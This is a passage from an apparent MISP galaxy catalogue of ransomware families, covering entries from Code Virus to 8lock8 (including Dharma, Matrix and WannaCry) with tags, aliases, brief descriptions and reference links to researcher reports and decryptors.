https://id-ransomware.blogspot.co.il/2016/09/dxxd-ransomware.html
https://www.bleepingcomputer.com/forums/t/634258/aes-key-gen-assistprotonmailcom-help-support/

Code Virus Ransomware

The tag is: misp-galaxy:ransomware="Code Virus Ransomware "

Table 5373. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/code-virus-ransomware.html

FLKR Ransomware

The tag is: misp-galaxy:ransomware="FLKR Ransomware"

Table 5374. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/flkr-ransomware.html

PopCorn Time Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others. Like shown in the note bellow: https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png

The tag is: misp-galaxy:ransomware="PopCorn Time Ransomware"

Table 5375. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html
https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/

HackedLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… NO POINT OF PAYING THE RANSOM—THE HACKER DOES NOT GIVE A DECRYPT AFTERWARDS.

The tag is: misp-galaxy:ransomware="HackedLocker Ransomware"

Table 5376. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/hackedlocker-ransomware.html

GoldenEye Ransomware

The tag is: misp-galaxy:ransomware="GoldenEye Ransomware"

View relationships graph

GoldenEye Ransomware has relationships with:

similar: misp-galaxy:ransomware="Petya" with estimative-language:likelihood-probability="likely"

Table 5377. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/goldeneye-ransomware.html
https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/
https://www.bleepingcomputer.com/forums/t/634778/golden-eye-virus/

Sage Ransomware

The tag is: misp-galaxy:ransomware="Sage Ransomware"

Table 5378. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/sage-ransomware.html
https://www.bleepingcomputer.com/forums/t/634978/sage-file-sample-extension-sage/
https://www.bleepingcomputer.com/forums/t/634747/sage-20-ransomware-sage-support-help-topic/

SQ_ Ransomware

The tag is: misp-galaxy:ransomware="SQ Ransomware"_

SQ_ Ransomware is also known as:

VO_ Ransomware

Table 5379. Table References
Links
https://id-ransomware.blogspot.co.il/2016/12/sq-vo-ransomware.html

Matrix

The tag is: misp-galaxy:ransomware="Matrix"

Matrix is also known as:

Malta Ransomware
Matrix Ransomware

Table 5380. Table References
Links
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2016-screenlockers-kangaroo-the-sfmta-and-more/
https://id-ransomware.blogspot.co.il/2016/12/matrix-ransomware.html
https://twitter.com/rommeljoven17/status/804251901529231360
https://www.bleepingcomputer.com/news/security/new-matrix-ransomware-variants-installed-via-hacked-remote-desktop-services/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/
https://twitter.com/demonslay335/status/1034212374805278720
https://www.bleepingcomputer.com/news/security/new-fox-ransomware-matrix-variant-tries-its-best-to-close-all-file-handles/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://twitter.com/demonslay335/status/1049314118409306112
https://twitter.com/demonslay335/status/1050118985210048512
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/
https://twitter.com/demonslay335/status/1039907030570598400

Satan666 Ransomware

The tag is: misp-galaxy:ransomware="Satan666 Ransomware"

Table 5381. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html

RIP (Phoenix) Ransomware

The tag is: misp-galaxy:ransomware="RIP (Phoenix) Ransomware"

RIP (Phoenix) Ransomware is also known as:

RIP
Phoenix

Table 5382. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html
https://twitter.com/BleepinComputer/status/804810315456200704

Locked-In Ransomware or NoValid Ransomware

The tag is: misp-galaxy:ransomware="Locked-In Ransomware or NoValid Ransomware"

Locked-In Ransomware or NoValid Ransomware is also known as:

Locked-In Ransomware
NoValid Ransomware

Table 5383. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html
https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/
https://twitter.com/struppigel/status/807169774098796544

Chartwig Ransomware

The tag is: misp-galaxy:ransomware="Chartwig Ransomware"

Table 5384. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html

RenLocker Ransomware (FAKE)

It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files don’t actually get encrypted, their names get changed using this formula: [number][.crypter]

The tag is: misp-galaxy:ransomware="RenLocker Ransomware (FAKE)"

Table 5385. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html

Thanksgiving Ransomware

The tag is: misp-galaxy:ransomware="Thanksgiving Ransomware"

Table 5386. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html
https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html
https://twitter.com/BleepinComputer/status/801486420368093184

CockBlocker Ransomware

The tag is: misp-galaxy:ransomware="CockBlocker Ransomware"

Table 5387. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html
https://twitter.com/jiriatvirlab/status/801910919739674624

Lomix Ransomware

The tag is: misp-galaxy:ransomware="Lomix Ransomware"

Table 5388. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html
https://twitter.com/siri_urz/status/801815087082274816

OzozaLocker Ransomware

The tag is: misp-galaxy:ransomware="OzozaLocker Ransomware"

Table 5389. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html
https://decrypter.emsisoft.com/ozozalocker
https://twitter.com/malwrhunterteam/status/801503401867673603

Crypute Ransomware

The tag is: misp-galaxy:ransomware="Crypute Ransomware"

Crypute Ransomware is also known as:

m0on Ransomware

Table 5390. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html
https://www.bleepingcomputer.com/virus-removal/threat/ransomware/

NMoreira Ransomware

The tag is: misp-galaxy:ransomware="NMoreira Ransomware"

NMoreira Ransomware is also known as:

Fake Maktub Ransomware

Table 5391. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html
https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

VindowsLocker Ransomware

The tag is: misp-galaxy:ransomware="VindowsLocker Ransomware"

Table 5392. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html
https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3hjw5m3sw84k8hlph
https://rol.im/VindowsUnlocker.zip
https://twitter.com/JakubKroustek/status/800729944112427008
https://www.bleepingcomputer.com/news/security/vindowslocker-ransomware-mimics-tech-support-scam-not-the-other-way-around/

Donald Trump 2 Ransomware

The tag is: misp-galaxy:ransomware="Donald Trump 2 Ransomware"

Table 5393. Table References
Links
http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html
https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/

Nagini Ransomware

The tag is: misp-galaxy:ransomware="Nagini Ransomware"

Nagini Ransomware is also known as:

Voldemort Ransomware

Table 5394. Table References
Links
http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html
https://www.bleepingcomputer.com/news/security/the-nagini-ransomware-sics-voldemort-on-your-files/

ShellLocker Ransomware

The tag is: misp-galaxy:ransomware="ShellLocker Ransomware"

Table 5395. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html
https://twitter.com/JakubKroustek/status/799388289337671680

Chip Ransomware

The tag is: misp-galaxy:ransomware="Chip Ransomware"

Chip Ransomware is also known as:

ChipLocker Ransomware

Table 5396. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html
http://malware-traffic-analysis.net/2016/11/17/index.html
https://www.bleepingcomputer.com/news/security/rig-e-exploit-kit-now-distributing-new-chip-ransomware/

Dharma Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS > Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant

The tag is: misp-galaxy:ransomware="Dharma Ransomware"

Table 5397. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html
https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/
https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://twitter.com/demonslay335/status/1049313390097813504
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/
https://twitter.com/JakubKroustek/status/1038680437508501504
https://twitter.com/demonslay335/status/1059521042383814657
https://twitter.com/demonslay335/status/1059940414147489792
https://twitter.com/JakubKroustek/status/1060825783197933568
https://twitter.com/JakubKroustek/status/1064061275863425025
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/
https://www.youtube.com/watch?v=qjoYtwLx2TI
https://twitter.com/GrujaRS/status/1072139616910757888

Angela Merkel Ransomware

The tag is: misp-galaxy:ransomware="Angela Merkel Ransomware"

Table 5398. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html
https://twitter.com/malwrhunterteam/status/798268218364358656

CryptoLuck Ransomware

The tag is: misp-galaxy:ransomware="CryptoLuck Ransomware"

CryptoLuck Ransomware is also known as:

YafunnLocker

Table 5399. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html
http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/
https://twitter.com/malwareforme/status/798258032115322880

Crypton Ransomware

The tag is: misp-galaxy:ransomware="Crypton Ransomware"

Crypton Ransomware is also known as:

Nemesis
X3M

Table 5400. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html
https://decrypter.emsisoft.com/crypton
https://www.bleepingcomputer.com/news/security/crypton-ransomware-is-here-and-its-not-so-bad-/
https://twitter.com/JakubKroustek/status/829353444632825856

Karma Ransomware

The tag is: misp-galaxy:ransomware="Karma Ransomware"

Table 5401. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html
https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2016-crysis-cryptoluck-chip-and-more/

WickedLocker HT Ransomware

The tag is: misp-galaxy:ransomware="WickedLocker HT Ransomware"

Table 5402. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html

PClock3 Ransomware

The tag is: misp-galaxy:ransomware="PClock3 Ransomware"

PClock3 Ransomware is also known as:

PClock SuppTeam Ransomware
WinPlock
CryptoLocker clone

Table 5403. Table References
Links
https://www.bleepingcomputer.com/news/security/old-cryptolocker-copycat-named-pclock-resurfaces-with-new-attacks/
https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html
http://researchcenter.paloaltonetworks.com/2015/09/updated-pclock-ransomware-still-comes-up-short/
https://decrypter.emsisoft.com/

Kolobo Ransomware

The tag is: misp-galaxy:ransomware="Kolobo Ransomware"

Kolobo Ransomware is also known as:

Kolobocheg Ransomware

Table 5404. Table References
Links
https://www.ransomware.wiki/tag/kolobo/
https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html
https://forum.drweb.com/index.php?showtopic=315142

PaySafeGen (German) Ransomware

This is most likely to affect German speaking users, since the note is written in German. Mostly affects users in German speaking countries. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PaySafeGen (German) Ransomware"

PaySafeGen (German) Ransomware is also known as:

Paysafecard Generator 2016
PaySafeCard
PaySafeGen

Table 5405. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html
https://twitter.com/JakubKroustek/status/796083768155078656

Telecrypt Ransomware

This is most likely to affect Russian speaking users, since the note is written in Russian. Therefore, residents of Russian speaking country are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransomware’s authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via Russian payment services Qiwi or Yandex.Money ). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt will generate a random string to encrypt with that is between 10-20 length and only contain the letters vo,pr,bm,xu,zt,dq.

The tag is: misp-galaxy:ransomware="Telecrypt Ransomware"

Table 5406. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html
http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked
https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3
https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/

CerberTear Ransomware

The tag is: misp-galaxy:ransomware="CerberTear Ransomware"

Table 5407. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html
https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/
https://twitter.com/struppigel/status/795630452128227333

FuckSociety Ransomware

The tag is: misp-galaxy:ransomware="FuckSociety Ransomware"

Table 5408. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html

PayDOS Ransomware

The tag is: misp-galaxy:ransomware="PayDOS Ransomware"

PayDOS Ransomware is also known as:

Serpent Ransomware

Table 5409. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/paydos-ransomware-serpent.html
https://www.bleepingcomputer.com/news/security/ransomware-goes-retro-with-paydos-and-serpent-written-as-batch-files/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/
https://www.proofpoint.com/us/threat-insight/post/new-serpent-ransomware-targets-danish-speakers

zScreenLocker Ransomware

The tag is: misp-galaxy:ransomware="zScreenLocker Ransomware"

Table 5410. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/zscreenlocker-ransomware.html
https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/
https://twitter.com/struppigel/status/794077145349967872

Gremit Ransomware

The tag is: misp-galaxy:ransomware="Gremit Ransomware"

Table 5411. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/gremit-ransomware.html
https://twitter.com/struppigel/status/794444032286060544
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

Hollycrypt Ransomware

The tag is: misp-galaxy:ransomware="Hollycrypt Ransomware"

Table 5412. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html

BTCLocker Ransomware

The tag is: misp-galaxy:ransomware="BTCLocker Ransomware"

BTCLocker Ransomware is also known as:

BTC Ransomware

Table 5413. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html

Kangaroo Ransomware

The tag is: misp-galaxy:ransomware="Kangaroo Ransomware"

Table 5414. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html
https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/

DummyEncrypter Ransomware

The tag is: misp-galaxy:ransomware="DummyEncrypter Ransomware"

Table 5415. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/dummyencrypter-ransomware.html

Encryptss77 Ransomware

The tag is: misp-galaxy:ransomware="Encryptss77 Ransomware"

Encryptss77 Ransomware is also known as:

SFX Monster Ransomware

Table 5416. Table References
Links
http://virusinfo.info/showthread.php?t=201710
https://id-ransomware.blogspot.co.il/2016/11/encryptss77-ransomware.html

WinRarer Ransomware

The tag is: misp-galaxy:ransomware="WinRarer Ransomware"

Table 5417. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/winrarer-ransomware.html

Russian Globe Ransomware

The tag is: misp-galaxy:ransomware="Russian Globe Ransomware"

Table 5418. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html

ZeroCrypt Ransomware

The tag is: misp-galaxy:ransomware="ZeroCrypt Ransomware"

Table 5419. Table References
Links
https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html

RotorCrypt(RotoCrypt, Tar) Ransomware

The tag is: misp-galaxy:ransomware="RotorCrypt(RotoCrypt, Tar) Ransomware"

RotorCrypt(RotoCrypt, Tar) Ransomware is also known as:

RotorCrypt
RotoCrypt
Tar Ransomware

Table 5420. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/
https://twitter.com/demonslay335/status/1050117756094476289

Ishtar Ransomware

The tag is: misp-galaxy:ransomware="Ishtar Ransomware"

Table 5421. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html

MasterBuster Ransomware

The tag is: misp-galaxy:ransomware="MasterBuster Ransomware"

Table 5422. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html
https://twitter.com/struppigel/status/791943837874651136

JackPot Ransomware

The tag is: misp-galaxy:ransomware="JackPot Ransomware"

JackPot Ransomware is also known as:

Jack.Pot Ransomware

Table 5423. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/jackpot-ransomware.html
https://twitter.com/struppigel/status/791639214152617985
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

ONYX Ransomeware

The tag is: misp-galaxy:ransomware="ONYX Ransomeware"

Table 5424. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/onyx-ransomware.html
https://twitter.com/struppigel/status/791557636164558848
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

IFN643 Ransomware

The tag is: misp-galaxy:ransomware="IFN643 Ransomware"

Table 5425. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/ifn643-ransomware.html
https://twitter.com/struppigel/status/791576159960072192
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

Alcatraz Locker Ransomware

The tag is: misp-galaxy:ransomware="Alcatraz Locker Ransomware"

Table 5426. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/
https://twitter.com/PolarToffee/status/792796055020642304

Esmeralda Ransomware

The tag is: misp-galaxy:ransomware="Esmeralda Ransomware"

Table 5427. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html
https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/

EncrypTile Ransomware

The tag is: misp-galaxy:ransomware="EncrypTile Ransomware"

Table 5428. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/encryptile-ransomware.html

Fileice Ransomware Survey Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of how the hacker tricks the user using the survey method. https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png The hacker definatly has a sense of humor: https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG

The tag is: misp-galaxy:ransomware="Fileice Ransomware Survey Ransomware"

Table 5429. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/fileice-ransomware-survey.html
https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

CryptoWire Ransomeware

The tag is: misp-galaxy:ransomware="CryptoWire Ransomeware"

Table 5430. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/cryptowire-ransomware.html
https://twitter.com/struppigel/status/791554654664552448
https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/

Hucky Ransomware

The tag is: misp-galaxy:ransomware="Hucky Ransomware"

Hucky Ransomware is also known as:

Hungarian Locky Ransomware

Table 5431. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html
https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe
https://twitter.com/struppigel/status/846241982347427840

Winnix Cryptor Ransomware

The tag is: misp-galaxy:ransomware="Winnix Cryptor Ransomware"

Table 5432. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html
https://twitter.com/PolarToffee/status/811940037638111232

AngryDuck Ransomware

The tag is: misp-galaxy:ransomware="AngryDuck Ransomware"

Table 5433. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html
https://twitter.com/demonslay335/status/790334746488365057

Lock93 Ransomware

The tag is: misp-galaxy:ransomware="Lock93 Ransomware"

Table 5434. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/lock93-ransomware.html
https://twitter.com/malwrhunterteam/status/789882488365678592

ASN1 Encoder Ransomware

The tag is: misp-galaxy:ransomware="ASN1 Encoder Ransomware"

Table 5435. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html
https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/

Click Me Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker tries to get the user to play a game and when the user clicks the button, there is no game, just 20 pictures in a .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif

The tag is: misp-galaxy:ransomware="Click Me Ransomware"

Table 5436. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html
https://www.youtube.com/watch?v=Xe30kV4ip8w

AiraCrop Ransomware

The tag is: misp-galaxy:ransomware="AiraCrop Ransomware"

Table 5437. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

JapanLocker Ransomware

The tag is: misp-galaxy:ransomware="JapanLocker Ransomware"

JapanLocker Ransomware is also known as:

SHC Ransomware
SHCLocker
SyNcryption

Table 5438. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html
https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker
https://github.com/fortiguard-lion/schRansomwareDecryptor/blob/master/schRansomwarev1_decryptor.php
https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots

Anubis Ransomware

The tag is: misp-galaxy:ransomware="Anubis Ransomware"

Table 5439. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html
http://nyxbone.com/malware/Anubis.html

XTPLocker 5.0 Ransomware

The tag is: misp-galaxy:ransomware="XTPLocker 5.0 Ransomware"

Table 5440. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/xtplocker-ransomware.html

Exotic Ransomware

The tag is: misp-galaxy:ransomware="Exotic Ransomware"

Table 5441. Table References
Links
https://www.bleepingcomputer.com/news/security/eviltwins-exotic-ransomware-targets-executable-files/
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/
https://www.cyber.nj.gov/threat-profiles/ransomware-variants/exotic-ransomware
https://id-ransomware.blogspot.co.il/2016/10/exotic-ransomware.html

APT Ransomware v.2

The tag is: misp-galaxy:ransomware="APT Ransomware v.2"

Table 5442. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/apt-ransomware-2.html

Windows_Security Ransonware

The tag is: misp-galaxy:ransomware="Windows_Security Ransonware"

Windows_Security Ransonware is also known as:

WS Go Ransonware
Trojan.Encoder.6491

View relationships graph

Windows_Security Ransonware has relationships with:

similar: misp-galaxy:ransomware="Encoder.xxxx" with estimative-language:likelihood-probability="likely"

Table 5443. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html
https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2

NCrypt Ransomware

The tag is: misp-galaxy:ransomware="NCrypt Ransomware"

Table 5444. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html

Venis Ransomware

The tag is: misp-galaxy:ransomware="Venis Ransomware"

Table 5445. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/venis-ransomware.html
https://twitter.com/Antelox/status/785849412635521024
http://pastebin.com/HuK99Xmj

Enigma 2 Ransomware

The tag is: misp-galaxy:ransomware="Enigma 2 Ransomware"

Table 5446. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/enigma-2-ransomware.html

Deadly Ransomware

The tag is: misp-galaxy:ransomware="Deadly Ransomware"

Deadly Ransomware is also known as:

Deadly for a Good Purpose Ransomware

Table 5447. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/deadly-ransomware.html
https://twitter.com/malwrhunterteam/status/785533373007728640

Comrade Circle Ransomware

The tag is: misp-galaxy:ransomware="Comrade Circle Ransomware"

Table 5448. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html

Globe2 Ransomware

The tag is: misp-galaxy:ransomware="Globe2 Ransomware"

Globe2 Ransomware is also known as:

Purge Ransomware

View relationships graph

Globe2 Ransomware has relationships with:

similar: misp-galaxy:ransomware="Globe3 Ransomware" with estimative-language:likelihood-probability="likely"

Table 5449. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html
https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221

Kostya Ransomware

The tag is: misp-galaxy:ransomware="Kostya Ransomware"

Table 5450. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html
http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

Fs0ciety Locker Ransomware

The tag is: misp-galaxy:ransomware="Fs0ciety Locker Ransomware"

Table 5451. Table References
Links
https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.html

Erebus Ransomware

The tag is: misp-galaxy:ransomware="Erebus Ransomware"

Table 5452. Table References
Links
https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html

WannaCry

According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of .1781 bitcoins, roughly $300 U.S.

The tag is: misp-galaxy:ransomware="WannaCry"

WannaCry is also known as:

WannaCrypt
WannaCry
WanaCrypt0r
WCrypt
WCRY

View relationships graph

WannaCry has relationships with:

similar: misp-galaxy:malpedia="WannaCryptor" with estimative-language:likelihood-probability="likely"

Table 5453. Table References
Links
https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

.CryptoHasYou.

Ransomware

The tag is: misp-galaxy:ransomware=".CryptoHasYou."

Table 5454. Table References
Links
http://www.nyxbone.com/malware/CryptoHasYou.html

777

Ransomware

The tag is: misp-galaxy:ransomware="777"

777 is also known as:

Sevleg

Table 5455. Table References
Links
https://decrypter.emsisoft.com/777

7ev3n

Ransomware

The tag is: misp-galaxy:ransomware="7ev3n"

7ev3n is also known as:

7ev3n-HONE$T

View relationships graph

7ev3n has relationships with:

similar: misp-galaxy:malpedia="7ev3n" with estimative-language:likelihood-probability="likely"

Table 5456. Table References
Links
https://github.com/hasherezade/malware_analysis/tree/master/7ev3n
https://www.youtube.com/watch?v=RDNbH5HDO1E&feature=youtu.be
http://www.nyxbone.com/malware/7ev3n-HONE$T.html

8lock8

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="8lock8"

Table 5457. Table References
Links
